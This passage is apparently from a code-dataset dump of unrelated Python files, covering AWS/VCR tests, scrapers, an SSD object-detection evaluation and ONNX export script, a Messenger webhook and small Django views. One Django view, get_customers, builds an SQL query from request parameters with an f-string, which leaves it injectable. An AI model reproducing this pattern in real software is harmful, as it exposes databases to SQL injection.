IAM_CLIENT.get_user(UserName=username)\n assert response['User']['UserName'] == username\n\n with vcr.use_cassette(str(tmpdir.join('boto3-medium.yml'))) as cass:\n response = IAM_CLIENT.get_user(UserName=username)\n assert response['User']['UserName'] == username\n assert cass.all_played\n\n\ndef test_boto_hardcore_mode(tmpdir):\n username = 'user'\n with vcr.use_cassette(str(tmpdir.join('boto3-hardcore.yml'))):\n ses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n region_name=os.environ['AWS_DEFAULT_REGION'],\n )\n\n iam_client = ses.client('iam')\n response = iam_client.get_user(UserName=username)\n assert response['User']['UserName'] == username\n\n with vcr.use_cassette(str(tmpdir.join('boto3-hardcore.yml'))) as cass:\n ses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n aws_session_token=None,\n region_name=os.environ['AWS_DEFAULT_REGION'],\n )\n\n iam_client = ses.client('iam')\n response = iam_client.get_user(UserName=username)\n assert response['User']['UserName'] == username\n assert 
cass.all_played\n","sub_path":"tests/integration/test_boto3.py","file_name":"test_boto3.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"358534067","text":"print(\"Suma y promedio de n numeros\")\n\nn=int(input(\"Digita un numero: \"))\n\ntotal_n=n\nsuma=0\n\nwhile n>=0:\n\tsuma+=n\n\tn-=1\n\nprint(\"La suma es \" + str(suma))\nprom=suma/total_n\nprint(\"El promedio es \" + str(prom))\nprint(\"Final del programa\")\n\n\t","sub_path":"N_64.py","file_name":"N_64.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"612999021","text":"import string\n\ndef cleanword(word):\n \"\"\"\n >>> cleanword('what?')\n 'what'\n >>> cleanword('\"now!\"')\n 'now'\n >>> cleanword('?+=\"word!,@$()\"')\n 'word'\n \"\"\"\n\n \n return word.strip('@$#,()!?+=\"')\n\n\ndef extract_words(s):\n \"\"\"\n >>> extract_words('Now is the time! \"Now\", is the time? Yes, now.')\n ['now', 'is', 'the', 'time', 'now', 'is', 'the', 'time', 'yes', 'now']\n >>> extract_words('she tried to curtsey as she spoke--fancy')\n ['she', 'tried', 'to', 'curtsey', 'as', 'she', 'spoke', 'fancy']\n \"\"\"\n\n str = s\n str = ''.join([ c for c in str if c not in ('@', '.', ',', \"'\", '\"', '!', '?', '&')])\n str = str.lower()\n str = str.replace('--', ' ') # treat double dashes as word separators\n str = str.split(' ')\n return str\n\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"wordtools.py","file_name":"wordtools.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"101444139","text":"#! python3\r\n# dmm.py - Download Meeting Media\r\n# Downloads all meeting media from jw.org\r\n\r\n# imports\r\nimport requests, bs4, webbrowser, pprint, os\r\n\r\n# Dummy dictionary for testing\r\ninfo = {'month': 'enero', 'year': '2019', 'dates': '7-13', 'path':\r\n 'C:\\\\Users\\\\Mack W\\\\Documents\\\\Python\\\\personalProjects\\\\Meeting Media Downloader'}\r\n\r\n# month, year, dates (Example: 7-13)\r\ndef inputs():\r\n info = {'month': '', 'year': '', 'dates': '', 'path': ''}\r\n keys = list(info.keys())\r\n for i in range(len(keys)):\r\n print('%s: ' % keys[i], end='')\r\n info[keys[i]] = input()\r\n return info \r\n\r\n# save workbook html\r\ndef guia(info):\r\n # all spanish workbooks start with this url\r\n base = 'https://www.jw.org/es/publicaciones/guia-actividades-reunion-testigos-jehova'\r\n # craft url using user input data\r\n month = info['month']\r\n year = info['year']\r\n dates = info['dates'] \r\n ext = '/%s-%s-mwb/programa-reunion-%sen/' % (month, year, dates)\r\n # download the url\r\n url = base + ext\r\n res = requests.get(url)\r\n res.raise_for_status()\r\n # workbook name\r\n workbook = ('%s %s workbook.txt' % (month, dates))\r\n # save to file\r\n file = open(workbook, 'wb')\r\n for chunk in res.iter_content(100000):\r\n file.write(chunk)\r\n file.close()\r\n\r\n# return urls of the meeting parts\r\ndef mediaUrls(info):\r\n month = info['month']\r\n dates = info['dates']\r\n \r\n # make soup object to parse the html\r\n file = open(('%s %s workbook.txt' % (month, dates)), 'rb')\r\n meetingSoup = bs4.BeautifulSoup(file, features=\"lxml\")\r\n \r\n # find elements (where the magic happens)\r\n elems = []\r\n elems += meetingSoup.select('a[class=\"pubSym-nwtsv\"]') # introduction to bible books videos\r\n elems += 
meetingSoup.select('a[class=\"pubSym-mwb19\"]') # tesoros y nuestra vida cristiana\r\n elems += meetingSoup.select('a[data-video]') # videos when it says 'el video'\r\n elems += meetingSoup.select('a[class=\"pubSym-thv\"]') # seamos mejores maestros\r\n elems += meetingSoup.select('a[class=\"pubSym-jy\"]') # Jesus-The Way jy book\r\n \r\n # find links\r\n urls = [] \r\n base = 'https://www.jw.org'\r\n for i in range(len(elems)):\r\n ext = elems[i].get('href')\r\n if ext.startswith('/'):\r\n url = base + ext\r\n else:\r\n url = ext\r\n urls.append(url)\r\n return urls\r\n\r\ndef web2text(urls):\r\n names = []\r\n # download and name media files\r\n for i in range(len(urls)):\r\n res = requests.get(urls[i])\r\n res.raise_for_status()\r\n soup = bs4.BeautifulSoup(res.text, features=\"lxml\")\r\n elem = soup.select('h1')\r\n if elem:\r\n name = elem[0].getText() + '.txt'\r\n names.append(name)\r\n file = open(name, 'wb')\r\n for chunk in res.iter_content(100000):\r\n file.write(chunk)\r\n file.close()\r\n return names\r\n\r\n# Main\r\n# info = inputs()\r\nos.chdir(info['path'])\r\n# guia(info)\r\nurls = mediaUrls(info)\r\nfileNames = web2text(urls)\r\nprint(fileNames)\r\n\r\n# TODO\r\n'''\r\nnew funtion\r\ndownloads media from the urls\r\nwhich are\r\nprovided by the mediaUrls function\r\n'''\r\n\r\n# Example: download video\r\n'''\r\ndwn_link = 'https://download-a.akamaihd.net/files/media_periodical/8f/mwbv_E_201901_01_r720P.mp4'\r\nfile_name = 'primera conversación.mp4' \r\nrsp = requests.get(dwn_link)\r\nrsp.raise_for_status()\r\nfile = open(file_name, 'wb')\r\nfor chunk in rsp.iter_content(100000):\r\n file.write(chunk)\r\nfile.close()\r\n\r\n# Video element\r\n# \r\n# \r\n'''\r\n\r\n\r\n\r\n","sub_path":"dmm.py","file_name":"dmm.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87313392","text":"import os\nfrom argparse import ArgumentParser\nfrom utils import DefaultBoxes, Encoder, COCODetection\nfrom base_model import Loss\nfrom utils import SSDTransformer\nfrom ssd_r34 import SSD_R34\nimport torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport time\nimport numpy as np\n\n\ndef parse_args():\n parser = ArgumentParser(description=\"Train Single Shot MultiBox Detector\"\n \" on COCO\")\n parser.add_argument('--data', '-d', type=str, default='../coco',\n help='path to test and training data files')\n parser.add_argument('--batch-size', '-b', type=int, default=4,\n help='number of examples for each iteration')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int,\n help='manually set random seed for torch')\n parser.add_argument('--device', '-did', type=int,\n help='device id') \n parser.add_argument('--threshold', '-t', type=float, default=0.212,\n help='stop training early at threshold')\n parser.add_argument('--checkpoint', type=str, default='./pretrained/resnet34-ssd1200.pth',\n help='path to model checkpoint file')\n parser.add_argument('--image-size', default=[1200,1200], type=int, nargs='+',\n help='input image sizes (e.g 1400 1400,1200 1200') \n parser.add_argument('--strides', default=[3,3,2,2,2,2], type=int, nargs='+',\n help='stides for ssd model must include 6 numbers') \n parser.add_argument('--use-fp16', action='store_true') \n parser.add_argument('--onnx', '-o', type=str, default=None,\n help='mode for onnx \\{export, eval\\}.')\n return 
parser.parse_args()\n\n\ndef show_memusage(device=0):\n import gpustat\n gpu_stats = gpustat.GPUStatCollection.new_query()\n item = gpu_stats.jsonify()[\"gpus\"][device]\n print(\"{}/{}\".format(item[\"memory.used\"], item[\"memory.total\"]))\n\n\ndef dboxes_R34_coco(figsize,strides):\n ssd_r34=SSD_R34(81,strides=strides)\n synt_img=torch.rand([1,3]+figsize)\n #if use_cude:\n # synt_img.to('cuda')\n # ssd_r34.to('cuda')\n _,_,feat_size =ssd_r34(synt_img, extract_shapes = True)\n print('Features size: ', feat_size)\n # import pdb; pdb.set_trace()\n steps=[(int(figsize[0]/fs[0]),int(figsize[1]/fs[1])) for fs in feat_size]\n # use the scales here: https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py\n scales = [(int(s*figsize[0]/300),int(s*figsize[1]/300)) for s in [21, 45, 99, 153, 207, 261, 315]] \n aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]] \n dboxes = DefaultBoxes(figsize, feat_size, steps, scales, aspect_ratios)\n print('dboxes from dboxes_R34_coco', dboxes)\n return dboxes\n\ndef coco_eval_export(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n if use_cuda:\n inp = inp.to('cuda')\n\n class SSDModel(torch.nn.Module):\n def __init__(self, backbone, encoder):\n super(SSDModel, self).__init__()\n self.backbone = backbone\n self.encoder = encoder\n\n def forward(self, inp):\n ploc, plabel, _ = self.backbone(inp)\n return self.encoder.decode_batch_with_multi_label_nms_trace(ploc, plabel, 0.50, 200, device=device)\n \n start_time=time.time()\n ploc, plabel, out2 = model(inp)\n time.time()-start_time\n print('Mode inference time: ', time.time()-start_time)\n\n try:\n result = encoder.decode_batch_with_multi_label_nms_trace(ploc, plabel, 0.50, 200,device=device)\n print('result:', result)\n except Exception as e:\n #raise\n print(e)\n print(\"No object detected in idx: {}\".format(idx))\n continue\n print('Decoding time: ', time.time()-start_time)\n\n # export to onnx\n import pytorch_tmp_patch\n def register_custom_op():\n # experimenting custom op registration.\n from torch.onnx.symbolic import parse_args, _cast_Int, _cast_Long\n def symbolic_multi_label_nms(g, boxes, scores, max_output_per_class, iou_threshold, score_threshold):\n return g.op('NonMaxSuppression', boxes, scores, max_output_per_class, iou_threshold, score_threshold)\n\n from torch.onnx import register_custom_op_symbolic\n register_custom_op_symbolic('roi_ops::multi_label_nms', symbolic_multi_label_nms)\n register_custom_op()\n\n print('Save model to onnx')\n import onnx_helper\n model_name = 'ssd_model'\n model_dir = 'test_' + model_name\n onnx_helper.Save('.', model_name, SSDModel(model, encoder), [inp], result, ['image'], ['bboxes', 'labels', 'scores'], do_constant_folding=True)\n\n # load back to ort\n import onnxruntime\n import onnx\n\n onnx_model_path = 'test_ssd_model/model.onnx'\n\n model = onnx.load(onnx_model_path)\n model = onnx_helper.update_with_default_names(model, ['bboxes', 'labels', 'scores'])\n model = onnx_helper.update_inputs_outputs_dims(model,\n [[1, 3, 1200, 1200]],\n [[1, 'nbox', 4], [1, 'nbox'], [1, 'nbox']])\n onnx.save(model, onnx_model_path)\n\n sess = 
onnxruntime.InferenceSession(onnx_model_path)\n\n out_onnx = sess.run(None, { sess.get_inputs()[0].name: inp.data.cpu().numpy() })\n print('out onnx:', out_onnx)\n break\n\n print(\"\")\n print(\"Export Ended, total time: {:.2f} s\".format(time.time()-start))\n\n\ndef coco_eval_onnx(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n ret = []\n\n import onnxruntime\n onnx_model_path = 'test_ssd_model/model.onnx'\n sess = onnxruntime.InferenceSession(onnx_model_path)\n\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n start_time=time.time()\n out_onnx = sess.run(None, {\n sess.get_inputs()[0].name: inp.data.cpu().numpy()\n })\n time.time()-start_time\n print('Detection time: ', time.time()-start_time)\n loc, label, prob = out_onnx\n\n print('Detections: ', label[0].shape)\n for loc_, label_, prob_ in zip(loc[0], label[0], prob[0]):\n ret.append([image_id, loc_[0]*wtot, \\\n loc_[1]*htot,\n (loc_[2] - loc_[0])*wtot,\n (loc_[3] - loc_[1])*htot,\n prob_,\n inv_map[label_]])\n\n print(\"\")\n print(\"Predicting Ended, total time: {:.2f} s\".format(time.time()-start))\n cocoDt = cocoGt.loadRes(np.array(ret))\n\n E = COCOeval(cocoGt, cocoDt, iouType='bbox')\n E.evaluate()\n E.accumulate()\n E.summarize()\n print(\"Current AP: {:.5f} AP goal: {:.5f}\".format(E.stats[0], threshold))\n\n return (E.stats[0] >= threshold) #Average Precision (AP) @[ IoU=050:0.95 | area= all | maxDets=100 ]\n\n\ndef coco_eval(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n ret = []\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n if use_cuda:\n inp = inp.to('cuda')\n start_time=time.time()\n ploc, plabel,_ = model(inp)\n time.time()-start_time\n print('Mode inference time: ', time.time()-start_time)\n try:\n result = encoder.decode_batch(ploc, plabel, 0.50, 200,device=device)[0]\n except:\n #raise\n print(\"No object detected in idx: {}\".format(idx))\n continue\n print('Decoding time: ', time.time()-start_time)\n loc, label, prob = [r.cpu().numpy() for r in result]\n \n for loc_, label_, prob_ in zip(loc, label, prob):\n ret.append([image_id, loc_[0]*wtot, \\\n loc_[1]*htot,\n (loc_[2] - loc_[0])*wtot,\n (loc_[3] - loc_[1])*htot,\n prob_,\n inv_map[label_]])\n print(\"\")\n print(\"Predicting Ended, total time: {:.2f} s\".format(time.time()-start))\n cocoDt = cocoGt.loadRes(np.array(ret))\n\n E = COCOeval(cocoGt, cocoDt, iouType='bbox')\n E.evaluate()\n E.accumulate()\n E.summarize()\n print(\"Current AP: {:.5f} AP goal: {:.5f}\".format(E.stats[0], threshold))\n\n return (E.stats[0] >= threshold) #Average Precision (AP) @[ IoU=050:0.95 | area= all | maxDets=100 ]\n\n\ndef eval_ssd_r34_mlperf_coco(args):\n from coco import COCO\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n dboxes = dboxes_R34_coco(args.image_size,args.strides)\n encoder = Encoder(dboxes)\n val_trans = SSDTransformer(dboxes, 
(args.image_size[0], args.image_size[1]), val=True)\n\n val_annotate = os.path.join(args.data, \"annotations/instances_val2017.json\")\n val_coco_root = os.path.join(args.data, \"val2017\")\n\n cocoGt = COCO(annotation_file=val_annotate)\n val_coco = COCODetection(val_coco_root, val_annotate, val_trans)\n inv_map = {v:k for k,v in val_coco.label_map.items()}\n\n print('ssd r34')\n ssd_r34 = SSD_R34(val_coco.labelnum, strides=args.strides)\n\n print(\"loading model checkpoint\", args.checkpoint)\n od = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)\n # import pdb; pdb.set_trace()\n ssd_r34.load_state_dict(od[\"model\"])\n\n if use_cuda:\n ssd_r34.cuda(args.device)\n loss_func = Loss(dboxes)\n if use_cuda:\n loss_func.cuda(args.device)\n\n if args.onnx:\n if args.onnx == 'export':\n return coco_eval_export(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n elif args.onnx == 'eval':\n return coco_eval_onnx(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n return coco_eval(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n\n\ndef main():\n args = parse_args()\n\n if not os.path.isdir('./models'):\n os.mkdir('./models')\n\n if args.seed is not None:\n print(\"Using seed = {}\".format(args.seed))\n torch.manual_seed(args.seed)\n np.random.seed(seed=args.seed)\n # torch.cuda.set_device(args.device)\n # torch.backends.cudnn.benchmark = True\n eval_ssd_r34_mlperf_coco(args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cloud/single_stage_detector/pytorch/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":12128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248553588","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport sqlite3\nimport string\nimport random\n\n# Create your views here.\n\n\ndef hello(request):\n return HttpResponse('hello')\n\n\ndef gen_password(request):\n try:\n if int(request.GET.get('param1')) <= 0:\n return HttpResponse('param1 must be >0')\n else:\n if int(request.GET.get('param1')) <8 or int(request.GET.get('param1')) > 24:\n return HttpResponse('param1 must be between 8 and 24')\n else:\n if request.GET.get('param2') == 'yes':\n return HttpResponse(''.join([\n random.choice(string.ascii_lowercase + string.digits)\n for _ in range(int(request.GET.get('param1')))\n ]))\n elif request.GET.get('param2') == 'no':\n return HttpResponse(''.join([\n random.choice(string.ascii_lowercase)\n for _ in range(int(request.GET.get('param1')))\n ]))\n except ValueError:\n return HttpResponse('Param1 must be a number')\n\n\ndef get_customers(request):\n print(request.GET)\n query = f'select * from customers where State = \"{request.GET.get(\"state\")}\" and City = \"{request.GET.get(\"city\")}\"'\n records = execute_query(query)\n return HttpResponse(records)\n\n\ndef execute_query(query):\n db_path = '/home/dmitry/Downloads/Telegram Desktop/chinook.db'\n conn = sqlite3.connect(db_path)\n cur = conn.cursor()\n cur.execute(query)\n records = cur.fetchall()\n return records\n\n\ndef get_unique_name(request):\n query = 'select distinct FirstName from customers'\n records = execute_query(query)\n num = 0\n for _ in records:\n num += 1\n return HttpResponse(f'{num}')\n\n\ndef get_value(request):\n q = 'select UnitPrice * Quantity from invoice_items'\n rec = execute_query(q)\n return 
HttpResponse(f'{rec}')\n\n","sub_path":"test_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460288044","text":"from django.conf.urls import include, url, patterns\nfrom django.conf.urls import url\nfrom .import views\n\nurlpatterns = [\n url(r'^post_list/$', views.post_list, name='post_list'),\n url(r'^post/(?P\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P\\d+)/edit/$', views.post_edit, name='post_edit'),\n url(r'^login/$', views.login_user, name='login_user'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481813653","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass CatMoviePipeline:\n file = None\n index = 0\n\n def open_spider(self, spider):\n self.file = open('movie.csv', 'a', encoding='utf-8')\n return self.file\n\n def process_item(self, item, spider):\n if self.index == 0:\n column_name = \"电影名称,上映时间,类型\\n\"\n self.file.write(column_name)\n self.index = 1\n home_str = item['name'] + ',' + item['rel'] + ',' + item['type'] + '\\n'\n self.file.write(home_str)\n\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","sub_path":"week01/cat_movie_scrapy/cat_movie/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269518039","text":"#!flask/bin/python\nfrom flask import Flask, request, render_template\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n access_token = '[YOUR_FACEBOOK_ACCESS_TOKEN]'\n verify_token = '[VERIFY_TOKEN]'\n\n if request.method == 'GET':\n hub_challenge = request.args.get('hub.challenge')\n hub_verify_token = request.args.get('hub.verify_token')\n\n if hub_verify_token == verify_token:\n return hub_challenge\n else:\n return render_template('index.html')\n\n elif request.method == 'POST':\n sender_id = None\n input_text = None\n request_json = request.json\n\n try:\n if 'sender' in request_json['entry'][0]['messaging'][0]:\n sender_id = request_json['entry'][0]['messaging'][0]['sender']['id']\n except KeyError as e:\n print('KeyError: {}'.format(e))\n\n try:\n if 'message' in request_json['entry'][0]['messaging'][0]:\n input_text = request_json['entry'][0]['messaging'][0]['message']['text']\n except KeyError as e:\n print('KeyError: {}'.format(e))\n\n if sender_id and input_text:\n # Your logic here...\n\n # Preparing the response\n url = 'https://graph.facebook.com/v2.6/me/messages?access_token=' + access_token\n json_data = {\n \"recipient\": {\n \"id\": sender_id\n },\n \"message\": {\n \"text\": \"Response text\"\n }\n }\n headers = {'Content-Type': 'application/json'}\n requests.post(url, json=json_data, headers=headers)\n return \"Message sent\"\n\n return \"Invalid request\"\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362783607","text":"import 
pickle\n\nimport numpy as np\n\nfrom .cls_config import cls_config\n\n\ndef load_model(file_path):\n with open(file_path, 'rb') as f:\n current_model = pickle.load(f)\n\n return current_model\n\n\ndef update_result(result, min_box_thresh, max_box_thresh):\n new_result = {}\n for k in result:\n label_boxes = np.array(result[k])\n\n if label_boxes.shape[0] > 0:\n label_boxes = label_boxes[\n np.logical_and(label_boxes[:, -1] > min_box_thresh, label_boxes[:, -1] <= max_box_thresh)]\n new_result[k] = label_boxes\n else:\n new_result[k] = result[k]\n return new_result\n\n\ndef get_test_data(result, box_thresh_list, feature_order):\n if box_thresh_list[0] != 0:\n box_thresh_list.insert(0, 0)\n if box_thresh_list[-1] != 1:\n box_thresh_list.append(1)\n\n tmp_feats = []\n for thresh_index in range(len(box_thresh_list) - 1):\n current_result = update_result(result, box_thresh_list[thresh_index], box_thresh_list[thresh_index + 1])\n\n for s_feature in feature_order:\n tmp_feats.append(len(current_result[s_feature]))\n\n return np.array([tmp_feats], dtype=np.float32)\n\n\ndef predict_result(clf, test_data):\n if isinstance(clf, list):\n result = []\n for m in clf:\n tmp_result = m.predict(test_data)\n result.append(tmp_result)\n\n tmp_result = np.array(result)\n tmp_result = np.swapaxes(tmp_result, 0, 1)\n result = []\n for s_r in tmp_result:\n unique, counts = np.unique(s_r, return_counts=True)\n result.append(unique[np.argmax(counts)])\n result = int(result[0])\n\n else:\n result = int(clf.predict(test_data)[0])\n\n return result\n\n\nclass img_cls_clf:\n def __init__(self):\n self.check_clf, self.check_feature_order, self.check_thresh_list, _, _ = load_model(cls_config.check_model_path)\n self.cls_clf, self.cls_feature_order, self.cls_thresh_list, self.cls_order, _ = load_model(\n cls_config.cls_model_path)\n\n def infer(self, result):\n test_data = get_test_data(result, self.check_thresh_list, self.check_feature_order)\n\n pos_check = predict_result(self.check_clf, test_data)\n if pos_check == 0:\n return 'normal'\n\n test_data = get_test_data(result, self.cls_thresh_list, self.cls_feature_order)\n cls_label_index = predict_result(self.cls_clf, test_data)\n return self.cls_order[cls_label_index]\n","sub_path":"infer_core/infer_image_cls/img_cls_clf.py","file_name":"img_cls_clf.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332306162","text":"#http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_1_D&lang=jp\n# Vector II\n \nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n \ndef loop_proc():\n (n1,n2) = map(int,input().split())\n wl =[]\n for i in range(n1):\n wl.append(deque())\n for i in range(n2):\n l = list(map(int,input().split())) \n if (l[0] == 0 ):\n wl[l[1]].append(l[2])\n elif (l[0] == 1 ):\n if ( len(wl[l[1]]) == 0 ):\n print (\"\")\n else:\n print (\" \".join(map(str,wl[l[1]])))\n elif (l[0] == 2 ):\n wl[l[1]] = deque()\n \n \nloop_proc()","sub_path":"ITP2/ITP2_1_D.py","file_name":"ITP2_1_D.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"239533851","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.home, name=\"home_page\"),\n path(\"greeting\", views.greeting, name='greeting'),\n path(\"intro\", views.intro, name='introduction'),\n path(\"date\", views.date, name='datetime'),\n path(\"task\", views.task, name=\"dictioanry_task\")\n\n]","sub_path":"first_project/first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33598129","text":"from os import listdir\r\nfrom os.path import isfile, join\r\nfrom bs4 import BeautifulSoup\r\nfrom word import wordSave\r\nimport mistune\r\nimport io\r\nimport os\r\nimport sys\r\nimport json\r\nimport re\r\n\r\n\r\n# {line:\"dsfdsfsfdsfsdffsd\",bold:True,italic:False,underline:False}\r\n\r\nclass WikiParser:\r\n def __init__(self):\r\n self.js = json.load(open('settings.json'))\r\n self.word = wordSave()\r\n self.downloadWikiPage()\r\n self.word.saveFile()\r\n\r\n def parseLine(self, htmlLine):\r\n # print(htmlLine)\r\n bs = BeautifulSoup(htmlLine, \"lxml\")\r\n\r\n # print(bs.prettify())\r\n body = bs.find('body').findChildren(recursive=False)\r\n # print(body)\r\n\r\n for element in body:\r\n bold = False\r\n italic = False\r\n underline = False\r\n arr = [{\"type\": \"text\", \"line\": \"\", \"bold\": False, \"italic\": False, \"underline\": False}]\r\n # print(element)\r\n for tag in element.contents:\r\n if tag != \"\\n\" and tag != \"\":\r\n self.getInner(arr, element)\r\n\r\n if element.name[0:1] == \"h\" and element.name[0:2] != \"hr\":\r\n self.word.addHeading(arr, int(element.name[1:2]))\r\n if element.name == \"p\":\r\n self.word.addPicture(arr)\r\n if element.name == \"li\" or element.name == \"ul\":\r\n self.word.addList(arr)\r\n if element.name == \"blockquote\":\r\n self.word.addParagraph(arr)\r\n if element.name != 'p' and element.name[0:1] != \"h\":\r\n print(arr)\r\n print(element)\r\n print(element.name)\r\n\r\n def getInner(self, arr, htmlTag):\r\n tag = htmlTag.name\r\n print(htmlTag)\r\n\r\n if tag is None:\r\n # arr.append(arr[-1])\r\n arr[-1][\"line\"] = htmlTag\r\n else:\r\n if tag == \"img\":\r\n arr[-1][\"type\"] = \"img\"\r\n arr[-1][\"src\"] = htmlTag['src']\r\n arr[-1][\"line\"] = htmlTag['alt']\r\n if tag == \"a\":\r\n arr[-1][\"src\"] = htmlTag['href']\r\n arr[-1][\"type\"] = \"link\"\r\n for tt in htmlTag.contents:\r\n if tt != \"\\n\" and tt != \"\":\r\n self.getInner(arr, tt)\r\n pass\r\n\r\n def getFiles(self, name):\r\n print(name)\r\n self.workDir = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\\\\" + name + \"\\\\\"\r\n onlyfiles = [f for f in listdir(self.workDir) if isfile(join(self.workDir, f))]\r\n print(onlyfiles)\r\n for file in onlyfiles:\r\n try:\r\n self.parseMd(self.workDir + file)\r\n except Exception:\r\n print(\"encoding file Exception\")\r\n continue\r\n\r\n def parseMd(self, file):\r\n with io.open(file, 'r', encoding='utf8') as fileHelp:\r\n f = fileHelp.readlines()\r\n htmlPage = \"\"\r\n for line in f:\r\n htmlPage += mistune.markdown(line)\r\n print(line)\r\n self.parseLine(htmlPage)\r\n\r\n @staticmethod\r\n def getAllInnerFiles(path):\r\n arr = []\r\n for file in listdir(path):\r\n print(isfile(file))\r\n if os.path.isfile(join(path, file)):\r\n arr.append(join(path, file))\r\n else:\r\n if os.path.isdir(join(path, file)):\r\n arr += WikiParser.getAllInnerFiles(join(path, file))\r\n return arr\r\n\r\n def printCode(self, filePath):\r\n with io.open(filePath, 'r', encoding='utf8') as fileHelp:\r\n f = 
fileHelp.readlines()\r\n self.word.addPageBreak()\r\n self.word.addHeadCode(filePath[len(os.path.dirname(sys.argv[0])) + 1:])\r\n self.word.addCode(f)\r\n\r\n def addCodeFiles(self, name):\r\n path = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\\\\" + name + \"\\\\\"\r\n onlyfiles = WikiParser.getAllInnerFiles(path)\r\n print(onlyfiles)\r\n ignoreStr = []\r\n chooseStr = []\r\n for str in self.js['ignoreFiles']:\r\n ignoreStr.append(str['regExp'])\r\n for str in self.js['chooseFiles']:\r\n chooseStr.append(str['regExp'])\r\n print(ignoreStr)\r\n print(chooseStr)\r\n regExpIgnore = re.compile(\"|\".join(ignoreStr))\r\n regExpChoose = re.compile(\"|\".join(chooseStr))\r\n answer = []\r\n for p in onlyfiles:\r\n hlp = regExpIgnore.search(p)\r\n if hlp is not None and len(hlp.group(0)) > 0:\r\n print(\"ignore\" + p)\r\n continue\r\n hlp = regExpChoose.search(p)\r\n if hlp is not None and len(hlp.group(0)) > 0:\r\n print(\"add\" + p)\r\n answer.append(p)\r\n for file in answer:\r\n self.printCode(file)\r\n\r\n # def 